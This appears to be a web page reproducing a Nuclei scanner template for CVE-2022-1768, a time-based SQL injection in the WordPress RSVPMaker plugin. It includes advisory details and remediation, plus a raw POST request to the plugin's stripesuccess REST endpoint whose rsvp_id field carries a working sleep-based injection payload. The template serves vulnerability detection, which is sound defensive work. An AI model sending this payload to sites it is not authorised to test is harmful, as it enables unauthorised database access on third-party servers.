WordPress RSVPMaker <=9.3.2 - SQL Injection

ID: CVE-2022-1768

Severity: high

Author: edoardottt

Tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications

Description

WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

YAML Source

id: CVE-2022-1768

info:
  name: WordPress RSVPMaker <=9.3.2 - SQL Injection
  author: edoardottt
  severity: high
  description: |
    WordPress RSVPMaker plugin through 9.3.2 contains a SQL injection vulnerability due to insufficient escaping and parameterization on user-supplied data passed to multiple SQL queries in ~/rsvpmaker-email.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation.
  remediation: |
    Update to the latest version of the RSVPMaker plugin (9.3.3 or higher) to mitigate the SQL Injection vulnerability.
  reference:
    - https://gist.github.com/Xib3rR4dAr/441d6bb4a5b8ad4b25074a49210a02cc
    - https://wordpress.org/plugins/rsvpmaker/
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2725322%40rsvpmaker&new=2725322%40rsvpmaker&sfp_email=&sfph_mail=
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1768
    - https://www.wordfence.com/vulnerability-advisories/#CVE-2022-1768
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-1768
    cwe-id: CWE-89
    epss-score: 0.10537
    epss-percentile: 0.95006
    cpe: cpe:2.3:a:carrcommunications:rsvpmaker:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: carrcommunications
    product: rsvpmaker
    framework: wordpress
  tags: time-based-sqli,cve,cve2022,wordpress,wp-plugin,wp,sqli,rsvpmaker,carrcommunications

http:
  - raw:
      - |
        @timeout: 15s
        POST /wp-json/rsvpmaker/v1/stripesuccess/anythinghere HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        rsvp_id=(select(0)from(select(sleep(7)))a)&amount=1234&email=randomtext

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=7'

      - type: word
        part: body
        words:
          - '"payment_confirmation_message":'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100b1944d02629d37bb1e9173f486d0574f9eddfa585ec4283f5aae505ae0dcf57702205c9aafa122cbbb15f21d17826f84046f9a07d429d6fabbf016bdec2d25798d12:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1768.yaml"

View on Github